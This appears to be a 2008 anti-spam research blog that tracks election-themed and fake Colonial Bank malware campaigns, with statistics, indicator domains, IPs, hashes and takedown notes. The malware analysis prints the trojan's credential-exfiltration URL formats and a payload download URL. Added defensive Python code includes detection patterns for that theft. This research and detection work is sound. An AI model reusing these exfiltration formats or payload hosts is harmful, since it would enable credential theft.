CVE-2006-5198 (WinZip_CreateNewFolderFromName)
CVE-2007-5601 (RealPlayer_IERPCtl)


Spam, Spam, Spam, and Spam



One great graphic in the report on page 67, shows the percentage of blocked spam by category.




Spam Categories (1H08 Microsoft percentage given, followed by how we see the trend now at the UAB Spam Data Mine):
(30.6%) Pharmacy-Sexual -- UP!
(20.9%) Other Pharmacy -- Slightly Down
(19.9%) Non-Pharmacy Product Ads -- DOWN
(9.6%) Stock -- DOWN - almost non-existent
(8.6%) Dating/Sexually Explicit Material -- SIGNIFICANTLY UP
(3.8%) Gambling -- UP!
(2.5%) Phishing -- Constant
(1.9%) Fraudulent Diplomas -- Down
(1.1%) 419 Scams -- Constant

To me this graphic could be labeled, "How Law Enforcement Should Spend Its Spam Fighting Resources". 51.5% of the spam Microsoft blocked during 1H08 was advertising pills! Whoever wants to take that on, please shoot me an email. We want to help. gar@cis.uab.edu


Malware


The most prevalent malware family, Win32/Zlob, is described in the report as "not especially notable from either a technical or a social-engineering perspective", yet it "deserves attention due to the sheer magnitude and persistence of the threat". The family has led the pack in number of infections since 1H07, and it continues to be removed by Microsoft security products more than twice as often as any other threat - around 9 million times in the first half of 2008.

Rather than recreate the entire geographic report, I thought it would be interesting to show the great difference between the Cyber Threat Experience in different geographies according to the Microsoft data.

In the United States, the top threat category was "Trojan Downloaders and Droppers" - those tiny files often encountered as "drive by infectors" on webpages whose only purpose is to download and execute additional commands. In the US, this accounted for 45.7% of the threat landscape, but in Brazil and China it was only 6.5%, while in Germany it was 39.5%. (NOTE: This is not saying 45.7% of US machines had a Trojan dropper -- this is saying 45.7% of the machines which came to Microsoft's attention as having been infected had a Trojan dropper on them.)

In the United States, only 8.4% of the threat landscape in 1H08 was made up of machines that had a Backdoor installed on them. But in Korea 14.9% of compromised machines had a Backdoor, and in Italy the number was 16.8%!

We'll run through the other categories, comparing the United States to China, Brazil, Germany, and "The World":

Trojan/Dropper:
US (45.7%) China (6.5%) Brazil (6.5%) Germany (39.5%) World (31.7%)

Other Trojans:
US (30.7%) China (22.2%) Brazil (8.2%) Germany (23.2%) World (23.9%)

Adware:
US (21.1%) China (8.3%) Brazil (9.7%) Germany (25.7%) World (20%)

Other Potentially Unwanted Software:
US (23.6%) China (43.8%) Brazil (11.6%) Germany (24%) World (25%)

Worms:
US (5.5%) China (10%) Brazil (11.6%) Germany (3.7%) World (11.3%)

Backdoors:
US (8.4%) China (9.9%) Brazil (3.7%) Germany (8.8%) World (9.2%)

Password and Monitoring Tools:
US (2.5%) China (23.4%) Brazil (62.1%) Germany (1.7%) World (8.5%)

Viruses:
US (1.7%) China (3.1%) Brazil (2.3%) Germany (2%) World (3.3%)

Spyware:
US (1.5%) China (3.8%) Brazil (.5%) Germany (.7%) World (1.8%)

Exploits:
US (1.6%) China (.3%) Brazil (.1%) Germany (.8%) World (1%)



Another Key -- how many machines were found to be infected in the US vs. other parts of the world? That is, how many computers had SOMETHING removed by the Malicious Software Removal Tool?

United States 2H07 (8.9%) 1H08 (11.2%) +25.5%
Brazil 2H07 (13.2%) 1H08 (23.9%) +81.8%
China 2H07 (4.7%) 1H08 (6.6%) +41.1%
Germany 2H07 (4.4%) 1H08 (5.3%) +19.7%

One question about what those numbers mean though -- is this an indication that computers in the US are twice as likely to be infected as computers in Germany? Or is this an indication that computers in the US are twice as likely to be running the Malicious Software Removal Tool than computers in Germany?

Specific Geographies


The second half of the report is dedicated to giving specific numbers of computers for which Microsoft tools detected and cleaned various categories, which answers the question immediately preceding.

Some key findings in our chosen "comparison countries":

Brazil

"The threat landscape in Brazil is clearly dominated by malware. The top four families in Brazil are all malware families". In Brazil, 1,294,084 machines had "Other Trojans" removed from them, while 246,470 machines were infected by "Worms".

The Top Families in Brazil were:
Win32/Bancos - 894,666 infections (a "banking Trojan", capturing banking credentials and targeting specifically Brazilian banks, in some cases able to alter transactions)
Win32/Banker - 359,933 infections (a "banking Trojan")
Win32/Rjump - 130,488 infections (a "USB-jumper" Worm)

China

32.5% of the computers in China are infected with "Other Potentially Unwanted Software", which can't be categorized as adware, spyware, or malware, but is still probably criminal - such as rogue security software which is purchased from criminals and does nothing on the computer it is installed on. Almost 700,000 computers in China had Password Stealers installed on them, with Win32/Frethog and Win32/Ceekat being the most common.

Only 1 of the worldwide Top 10 malware families is present in China. (Win32/Rjump, the USB jumper that was so prevalent in Brazil ranked #7 in China).

Germany

More than 500,000 computers in Germany had a Trojan/Dropper installed. The malware infection rate in Germany has increased 19.7% since 2H07. Adware was Germany's #2 threat, with 327,000 computers having Adware installed, a 79.6% increase over 2H07. Zlob was the top "Dropper" with 427,563 installs cleaned, while ZangoSearchAssistant was the top Spyware, with 130,770 installs removed.

United States

11.2% of US computers had software cleaned by the Malicious Software Removal Tool. This is a 38% increase over 2H07. 7,044,340 computers had a Trojan/Dropper, while 5,014,874 computers had an "Other/Trojan". 3.5 Million had "Other Potentially Unwanted Software", 3.3 Million had "Adware" and 1.3 Million computers had a backdoor. 847,972 were infected with a Worm, and 265,038 had Password Stealers active.

The "Other Trojan" numbers account for a 52.6% increase from 2H07.

Monday, November 10, 2008

Election Malware and Obama Pill Ads?

Just a quick post to update the situation we described in our previous posts that we are now thinking of as Election Malware Round One and Election Malware Round Two. Round One was the Obama Acceptance Speech video and Round Two was the McCain video. Technically, I guess that means we are currently looking at Round Two B, since the webpage hasn't changed - we just have a fresh batch of domain names.


Election Malware: Round Three


We made contact over the weekend with a real live human at Bizcn.com, who terminated all the domains listed above. Unfortunately, the spammer created new ones and this morning (10NOV08) at 7:52 AM we began to see his latest round of spam. In the first three hours of this spam campaign, the spam is evenly split between three domains created last night:

- miteodemo.com
- oirerbio.com
- demovideons.com

All three domains use the nameserver ns1.vistausan.com, which was also freshly registered last night at bizcn.com.

Computers which are currently hosting proxy redirectors for the domains above also provided redirection services for some of the "Round two" domain names. Some examples currently hosting would be:

118.219.111.107
190.47.161.2
221.184.68.214
89.36.135.102
91.90.229.209

But these are "fluxing" - they will change over the course of the hours as we wait for bizcn.com to shut down these newest domains and their nameserver domain. The shutdown request, in Chinese and English, was sent just now (10:40 AM Central Time).
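The two signals this post relies on, A records churning across unrelated networks and several domains sharing one freshly registered nameserver, can be checked automatically from passive-DNS observations. The following is an added example, not code from the original post; every domain, IP and nameserver name in it is a constructed placeholder.

```python
"""Flag fast-flux behaviour and shared infrastructure from passive-DNS data."""
from collections import defaultdict
from ipaddress import ip_address

# Constructed passive-DNS observations: (timestamp, domain, ip, ttl).
# Domains and IPs are placeholders, not the ones seen in the post.
OBS = [
    ("2008-11-10T07:52", "flux-a.invalid", "198.51.100.7", 300),
    ("2008-11-10T08:05", "flux-a.invalid", "203.0.113.22", 300),
    ("2008-11-10T08:20", "flux-a.invalid", "192.0.2.140", 300),
    ("2008-11-10T08:35", "flux-a.invalid", "198.51.100.9", 300),
    ("2008-11-10T08:50", "flux-a.invalid", "203.0.113.75", 300),
    ("2008-11-10T07:52", "flux-b.invalid", "192.0.2.140", 300),
    ("2008-11-10T08:30", "flux-b.invalid", "198.51.100.7", 300),
    ("2008-11-10T09:00", "flux-b.invalid", "203.0.113.22", 300),
    ("2008-11-10T09:30", "flux-b.invalid", "192.0.2.77", 300),
    # A normal site behind two load-balanced hosts on one network, long TTL.
    ("2008-11-10T07:52", "static.invalid", "192.0.2.10", 86400),
    ("2008-11-10T10:00", "static.invalid", "192.0.2.11", 86400),
]

# Constructed NS records: the authoritative nameserver for each domain.
NS = {
    "flux-a.invalid": "ns1.freshly-registered.invalid",
    "flux-b.invalid": "ns1.freshly-registered.invalid",
    "static.invalid": "ns1.hoster.invalid",
}


def net_key(ip):
    """Coarse network key (first two octets); a stand-in for a real ASN lookup."""
    return ".".join(str(ip_address(ip)).split(".")[:2])


def flux_stats(obs):
    """Per domain: distinct IPs, distinct coarse networks, and the lowest TTL seen."""
    per = defaultdict(lambda: {"ips": set(), "nets": set(), "min_ttl": None})
    for _ts, dom, ip, ttl in obs:
        s = per[dom]
        s["ips"].add(ip)
        s["nets"].add(net_key(ip))
        s["min_ttl"] = ttl if s["min_ttl"] is None else min(s["min_ttl"], ttl)
    return dict(per)


def is_fluxing(stats, min_ips=4, min_nets=3, max_ttl=600):
    """Heuristic: many short-TTL A records spread over several networks."""
    return (len(stats["ips"]) >= min_ips
            and len(stats["nets"]) >= min_nets
            and stats["min_ttl"] <= max_ttl)


def flux_report(obs, ns):
    """Return ({domain: fluxing?}, {nameserver: [domains]})."""
    stats = flux_stats(obs)
    verdict = {d: is_fluxing(s) for d, s in stats.items()}
    by_ns = defaultdict(list)
    for d in stats:
        by_ns[ns.get(d, "?")].append(d)
    return verdict, dict(by_ns)


def shared_infrastructure(obs):
    """IPs that served more than one domain: proxy nodes reused across campaigns."""
    ip_to_domains = defaultdict(set)
    for _ts, dom, ip, _ttl in obs:
        ip_to_domains[ip].add(dom)
    return {ip: sorted(doms) for ip, doms in ip_to_domains.items() if len(doms) > 1}


if __name__ == "__main__":
    verdict, by_ns = flux_report(OBS, NS)
    for dom, fluxing in verdict.items():
        print("%-16s fluxing=%s ns=%s" % (dom, fluxing, NS.get(dom)))
    for ip, doms in shared_infrastructure(OBS).items():
        print("shared node %s -> %s" % (ip, ", ".join(doms)))
```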

Barack Sex Video malware


The only other piece of malware we are seeing delivered via election headlines is a well-detected trojan claiming to be a Barack Obama sex video. The great majority of products detect this malware at VirusTotal.com.

The porn video attachment name we are seeing most often is "zeland-01.zip".

Michelle Obama's Name used in Pill Spam


Why anyone would think that email recipients would buy Viagra after reading headlines like these is beyond my comprehension. Two heavily spammed subjects today used to sell Canadian Pharmacy pills are tied to Michelle Obama's name.

Twenty domain names were seen advertised in spam using the subject "Bush kills Michelle Obama":


Another 26 domain names were all used in spam with the subject line "Michelle Obama nude":


Each of those domain names actually forwards to another domain name when visited, which sells Canadian Pharmacy pills. Spammers use this technique to keep the domains that appear in their spam separate from the domains through which orders are placed, because some affiliate programs actually do refuse payment to affiliates who can be shown to be spamming. By using this forwarding technique, spammers can claim that their order-taking domains were NOT used in spam messages.
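One defender-side way to document this technique is to follow the redirect chain from each spamvertised domain and record the landing site it forwards to, so that the abuse report names the beneficiary rather than the throwaway domain. The following is an added example, not code from the original post; its fetch function reads a constructed redirect table (placeholder domain names) in place of live HTTP requests, and a real client would follow Location headers one hop at a time in the same way.

```python
"""Attribute spamvertised redirect domains to the landing site they forward to."""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: each entry maps a URL to the Location header it answers
# with. Every name here is a placeholder, not a domain from the post.
CONSTRUCTED_REDIRECTS = {
    "http://spam-a.invalid/": "http://spam-a.invalid/go.php",
    "http://spam-a.invalid/go.php": "http://pillshop-landing.invalid/?aff=17",
    "http://spam-b.invalid/": "http://pillshop-landing.invalid/?aff=17",
    "http://spam-c.invalid/": "http://othershop.invalid/",
    # A redirect loop, to exercise the loop guard.
    "http://loop-x.invalid/": "http://loop-y.invalid/",
    "http://loop-y.invalid/": "http://loop-x.invalid/",
}


def fake_fetch(url):
    """Stand-in for an HTTP HEAD/GET: return the Location header, or None if
    the URL is a final page. Replace with a real client to run it live."""
    return CONSTRUCTED_REDIRECTS.get(url)


def follow_redirects(start_url, fetch=fake_fetch, max_hops=10):
    """Follow Location headers from start_url one hop at a time.
    Returns (chain, outcome) where outcome is 'landed', 'loop' or 'hop_limit'."""
    chain = [start_url]
    seen = {start_url}
    for _ in range(max_hops):
        nxt = fetch(chain[-1])
        if nxt is None:
            return chain, "landed"
        chain.append(nxt)
        if nxt in seen:          # spammer's redirector is misconfigured or stalling
            return chain, "loop"
        seen.add(nxt)
    return chain, "hop_limit"


def landing_host(url):
    """Host name of the final page, lower-cased, for grouping."""
    return (urlsplit(url).hostname or "").lower()


def attribute_landing_sites(spam_domains, fetch=fake_fetch):
    """Map each landing host to the spam domains that forward to it.
    Chains that never land are grouped under an '(unresolved: ...)' key."""
    landing = defaultdict(list)
    for d in spam_domains:
        chain, outcome = follow_redirects("http://%s/" % d, fetch)
        key = landing_host(chain[-1]) if outcome == "landed" else "(unresolved: %s)" % outcome
        landing[key].append(d)
    return dict(landing)


if __name__ == "__main__":
    report = attribute_landing_sites(
        ["spam-a.invalid", "spam-b.invalid", "spam-c.invalid", "loop-x.invalid"])
    for site, doms in report.items():
        print("%s <- %s" % (site, ", ".join(doms)))
```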

Friday, November 07, 2008

Election Malware Targets Sore Losers - McCain Video Loads Virus

We reported on Wednesday morning that Obama's historic victory was being used by cyber criminals in a spam campaign which attempted to trick email readers into watching a video of Obama's acceptance speech. Clicking the email link took readers to a website which seemed to have a video, but which prompted users to install "Adobe_Flash9.exe", which was not a video player upgrade, but actually a computer virus.

Today the spammers have decided to take a more negative spin on their spam campaign. While "round one" of the malware seemed to try to appeal to those who were happy that Obama had won, "round two" is trying to trick the Haters into infecting themselves. More than 450 emails have already been received at the UAB Spam Data Mine with such negative subject lines as these:

Barack Obama can lost presidents chair
Barack Obama can lost President's Chair
Barack Obama in Danger - McCain will fight for president post
Barack Obama president resignation - 23/7 News
From Billy Mccain
IMPEACH Barrack Obama | USA government news
McCain Lawmakers Impeach Obama
McCain Lawyers Want to Stop Obama
McCain said today: 'Impeach Obama'
McCain strike against Obama political way
McCain vs Obama - There is a higher potential for confrontation between opposing political forces
McCain want to stop Obama
Moms who voted for Obama
Obama faces impeachment
Obama Impeachment Resources: McCain Look at the Impeachment Process
Obama vs McCain 'Political Strike' May Undermine Labor Group
Scandal: Obama Resignation Letter
Scandal: Re-elections John McCain Will be a Dictator?
Scandal: Re-elections John McCain will defeat Barack Obama
Scandal: Re-elections McCain will win
Scandal: Re-elections Obama: McCain Will Close With Attacks
Scandal: Re-elections Why John McCain will keep fighting
Scandal: Re-elections Why McCain Will Win
The Impeachment of new president Obama
Video: Obama post-resignation speech
Why MccAin Want to Stop Obama From president vacancy?
WScandal: Re-elections hich John McCain will show up to debate?


The website looks like this: [screenshot of the website]




As before, the domain names are all newly registered in China with the registrar Bizcn.com. The domain names now are:

baraokl.com
oritrsunwart.com
preibrsu.com
serensy.com

Visiting any of the webpages will cause the same "pop-up" which claims that an update is needed to the "Adobe Media Player". It's NOT the same executable that was being used Wednesday morning, but a "re-packing" of the same malware. In other words, it does the same thing, but it's still going to need new anti-virus signatures to detect it.

The virus this time around is:

File size: 25173 bytes
MD5...: 642a588272e9fe723fb2f1dd8fccede5

Here's a link to the VirusTotal report which shows 22 of 36 AV products currently detect this version of the malware.

Students studying computer forensics at UAB have analyzed this version of the malware and confirmed that the stolen data is sent to the same Ukrainian computer address as the original Obama acceptance speech video and the recent Colonial Bank Digital Certificate malware, 91.203.93.57.

We've sent a request for cooperation for shutdown to the abuse address of record for that IP, abuse@uatelecom.com.ua (good luck, right?)

The malware is hidden on the computer with the name: \9129837.exe and invoked whenever Internet Explorer is active on the computer.

Stolen userids and passwords are sent to the Ukrainian computer using strings that follow this pattern:

http://%s%s?user_id=%.4u&version_id=%s&passphrase=%s&socks=%lu&version=%lu&crc=%.8x
URL: sniffer_ftp_%s
ftp_server=%s&ftp_login=%s&ftp_pass=%s&version=%lu
URL: sniffer_pop3_%s
pop3_server=%s&pop3_login=%s&pop3_pass=%s
URL: sniffer_imap_%s
imap_server=%s&imap_login=%s&imap_pass=%s
URL: sniffer_icq_%s
icq_user=%s&icq_pass=%s

The packer used to make it more difficult to analyze the malware is called "FSG".
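Those format strings are enough to write a detection rule for a web proxy log: the check-in is a GET whose query string has exactly the keys user_id, version_id, passphrase, socks, version and crc, and the credential uploads go to a path containing sniffer_ftp_, sniffer_pop3_, sniffer_imap_ or sniffer_icq_. The following is an added example, not code from the post or from the UAB analysis; it runs those rules over constructed proxy log lines (the log format, hostnames and values are all made up).

```python
"""Detect the check-in and credential-upload requests from the format strings above."""
import re
from urllib.parse import urlsplit, parse_qs

# Check-in query keys. In the format string user_id is %.4u (at least 4
# digits), socks and version are %lu (decimal) and crc is %.8x (8 lowercase hex).
CHECKIN_KEYS = {"user_id", "version_id", "passphrase", "socks", "version", "crc"}
CRC_RE = re.compile(r"[0-9a-f]{8}")

# Uploads go to a path containing sniffer_<proto>_<suffix>; the POST body
# carries the keys below (the ICQ variant has no server field).
SNIFFER_PATH = re.compile(r"sniffer_(ftp|pop3|imap|icq)_", re.IGNORECASE)
SNIFFER_BODY = {
    "ftp": {"ftp_server", "ftp_login", "ftp_pass", "version"},
    "pop3": {"pop3_server", "pop3_login", "pop3_pass"},
    "imap": {"imap_server", "imap_login", "imap_pass"},
    "icq": {"icq_user", "icq_pass"},
}


def is_checkin(url):
    """True if the query string has exactly the check-in keys with plausible values."""
    q = {k: v[0] for k, v in parse_qs(urlsplit(url).query, keep_blank_values=True).items()}
    if set(q) != CHECKIN_KEYS:   # exact key set: legitimate sites rarely use this combination
        return False
    return (q["user_id"].isdigit() and len(q["user_id"]) >= 4
            and q["socks"].isdigit() and q["version"].isdigit()
            and CRC_RE.fullmatch(q["crc"]) is not None)


def sniffer_kind(url, body=""):
    """Return 'ftp', 'pop3', 'imap' or 'icq' for an upload request, else None.
    If a body was captured it must carry that protocol's keys; a URL alone is
    still a hit because proxy logs usually do not record POST bodies."""
    m = SNIFFER_PATH.search(urlsplit(url).path)
    if not m:
        return None
    proto = m.group(1).lower()
    if body and not SNIFFER_BODY[proto] <= set(parse_qs(body, keep_blank_values=True)):
        return None
    return proto


# Constructed log format: "<timestamp> <client_ip> <method> <url> [<post_body>]"
LOG_LINE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+)(?: (\S+))?$")


def scan_log(lines):
    """Return (client_ip, kind, url) for each line that looks like exfiltration."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        _ts, client, _method, url, body = m.groups()
        if is_checkin(url):
            hits.append((client, "checkin", url))
        else:
            kind = sniffer_kind(url, body or "")
            if kind:
                hits.append((client, "sniffer_" + kind, url))
    return hits


# Constructed sample lines; the host cnc-host.invalid stands in for the real drop.
SAMPLE_LOG = [
    "2008-11-07T09:12:01 10.0.0.5 GET http://cnc-host.invalid/gate/?user_id=0042&version_id=1&passphrase=abc&socks=0&version=1&crc=1a2b3c4d",
    "2008-11-07T09:12:07 10.0.0.5 POST http://cnc-host.invalid/gate/sniffer_ftp_0042 ftp_server=ftp.example.net&ftp_login=bob&ftp_pass=hunter2&version=1",
    "2008-11-07T09:12:09 10.0.0.5 POST http://cnc-host.invalid/gate/sniffer_icq_0042 icq_user=12345&icq_pass=secret",
    "2008-11-07T09:13:00 10.0.0.9 GET http://www.example.com/search?q=user_id",
    "2008-11-07T09:13:30 10.0.0.9 GET http://shop.example.com/?user_id=0042&version=3",
    "2008-11-07T09:14:00 10.0.0.9 POST http://cnc-host.invalid/gate/sniffer_pop3_7 foo=bar",
]

if __name__ == "__main__":
    for client, kind, url in scan_log(SAMPLE_LOG):
        print("%s %-12s %s" % (client, kind, url))
```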

Bottom line - don't click on links in email. If you DID click on this link, you need very badly to check out your computer for potential malware.

Thursday, November 06, 2008

Yesterday's Obama Spammer Now Imitates Colonial Bank

In yesterday's blog, we talked about Obama spam spreading a virus. In that attack there were five domain names, all registered in China on Bizcn.com, being used to download a computer program which would steal your passwords and send them to criminals.

Today we have a new spam campaign which uses five domain names, all registered in China on Bizcn.com, being used to download a computer program which would steal your passwords and send them to criminals.

Both of the groups of five domains used a nameserver which was located on the IP address 69.162.111.11 (which is in Dallas, Texas).

When you visited the webpage yesterday, a pop up box asked you to download a video player. Today when you visit one of the Colonial webpages, a pop up box asks you to download a digital certificate.

Yesterday we received over 500 copies of the Obama spam with various subjects.

Today we've received over 300 copies of the Colonial Bank spam with subjects including:

Colonial Bank - authorized users performing appropriate functions
Colonial Bank Warning: services specific high-risk geographical areas.
Colonial Bank - Display of Information
Colonial Bank Warning: system disables passwords that haven't been used by a customer in 90 days.
Colonial Bank Warning: subject to monitoring and validation for authenticity and appropriateness.
Colonial Bank Treasury Services
Colonial Bank Warning: terminate your Internet banking session
Colonial Bank Warning: Electronic requests received over the Internet
Colonial Bank has developed an update for log in page
Colonial Bank also provides extensive information regarding identity theft prevention
Colonial Bank would like to announce latest update
Colonial Bank Warning: access the Bank's servers.
Colonial Bank Warning: software designed to protect against inappropriate requests.
Colonial Bank security # latest patches and updates installation.
Colonial Bank recommend that you use fraud prevention procedures
Colonial Bank Update.
Colonial Bank - Network Security and Monitoring
Colonial Bank - your password will never be displayed on your computer screen
Colonial Bank Warning: retrieving web pages or sending inquiries
Colonial Bank security # Ensure that your operating system has all latest patches and updates installed.
Colonial Bank Alert: SERVER UPDATE.
Colonial Bank recommend that you use security update
Colonial Bank - data sent over the encrypted connection has been altered in transit.
Colonial Bank has developed a Fraud Prevention Checklist
Colonial Bank recommend to review your account security
Colonial Bank Security and Identity Protection Newsletter
Colonial Bank Warning: prevent access to online banking from an IP network
Colonial Bank has developed special file protection
Colonial Bank Warning: ur Internet banking system encrypts stored password files
Colonial Bank Commercial Customer Service
Colonial Bank has developed new free protection tool
Colonial Bank - all information sent between a client and a server encrypted
Colonial Bank Warning: initial registration
Colonial Bank would like to inform you security updates
Colonial Bank security # Ensure that your operating system updated.
Colonial Bank Alert - Update.
Colonial Bank has developed a new 128 bit sofware
Colonial Bank security # apply updates
Colonial Bank - providing a high degree of confidentiality.
Colonial Bank News - security development
Colonial Bank - effort to limit access to its servers
Colonial Bank Java Update Includes Security Fixes - Security Fix.
Colonial Bank Warning: using the Secure Sockets Layer (SSL) protocol.
Colonial Bank Customer Warning.
UPDATE ALERT CONFIGURATION Colonial Bank.
Colonial Bank - Secure Data Transfer
Colonial Bank would like to inform you
Colonial Bank - the user and the server are in a secure environment.
Colonial Bank would like to inform you lates development
Colonial Bank Online server update.
Colonial Bank Warning: Your Password, and certain other private information
Colonial Bank has developed new anti-Fraud feature
Colonial Bank Update Alert.
Colonial Bank Security Response Center (MSRC) : UPDATE.
Colonial Bank Warning: termination of Inactive Connections
Colonial Bank Emergency Alert System.
Colonial Bank Connection Security
Colonial Bank upgrade warning.
Colonial Bank Warning: allowing only the traffic that is necessary to send acceptable data requests
Colonial Bank Warning: if you are not actively using the system.
Colonial Bank Warning: this is accomplished by filtering Internet traffic
Colonial Bank Update - News.
Colonial Bank would like to stop fraud practice
Colonial Bank - these actions may include the implementation of restrictions
Colonial Bank - Data traveling between the user and the server is encrypted
Colonial Bank Warning: suspicious or potentially harmful activity
Colonial Bank Time Warner Security - Customer Service.
Colonial Bank Installation and Upgrade Warning.
Server Update Services Colonial Bank.
Colonial Bank has developed serious protection
Colonial Bank Urgent Customer Alert: "Joomla!" Security Update.
Colonial Bank - Other Security Measures
Colonial Bank WindowsXP/2000 customers Attention!
Colonial Bank - Security Fix.
Colonial Bank Warning: the sending software
Colonial Bank Guards and Protects Your Information
Colonial Bank would like to make you aware of online fraud
Colonial Bank - Our Internet banking system
Colonial Bank Security
Colonial Bank - an encrypted SSL connection required
Colonial Bank is committed to providing you with a convenient, safe and secure online banking
Colonial Bank Warning: we also monitor Internet traffic
Colonial Bank - takes several measures.
Visit a Colonial Bank Financial Center
Colonial Bank Services
Colonial Bank Warning: Electronic requests are filtered through a combination of computer hardware and software
Colonial Bank would like to open new security features
Colonial Bank Warning: automatically determining
Colonial Bank - an encrypted SSL connection is equipped with a mechanism for detecting tampering
Colonial Bank recommend that you use updated browser
Colonial Bank recommend that you use 128 bit file
Colonial Bank Regular Update Alert.
Colonial Bank Customer Support - Security Updates.

Here is today's webpage:



The domain names used today are:

coloneldi.com/security.php
gdieuntso.com/security.php
porentud.com/security.php
reteinr.com/security.php
rutriyn.com/security.php

Each of these domains was registered today (November 6, 2008) on Bizcn.com.

Visiting the Colonial pages above drops ColonialSETUP.exe.

VirusTotal (17/36)

http://www.virustotal.com/analisis/9dfd058ab879365aa719e4a0055b2b46

File size: 3369 bytes

MD5...: 60e39dd91cd4676c70d4ee844eb5a6c7

The phase one malware makes a connection to the following URL to download the phase two malware:

chload.com/u1.exe

chload.com was registered TODAY on Register.com.

The nameserver for chload.com is ns1.ldern.com.

That is also the nameserver for:

customlod.com
upgradell.com
solecokes.com
lodnew.com

which have all ALSO been used to download Phase Two malware for Digital Certificate spam.

The second phase malware (u1.exe) was also analyzed by VirusTotal.

http://www.virustotal.com/analisis/a0c5718489e7022da2f5bf35ef03adc8

It showed a 21/36 detection rate:
File size: 25161 bytes
MD5...: 6a1e70482b86500229ebdc99b13792ba

u1.exe installs itself as "comctl32.dll" and includes root kit and keylogging technology. I have not had a chance yet to see where the keylogged data is sent.

A request to terminate chload.com and ldern.com has been sent to register.com.

A request to terminate the following domains has been sent to bizcn.com.

coloneldi.com
gdieuntso.com
porentud.com
reteinr.com
rutriyn.com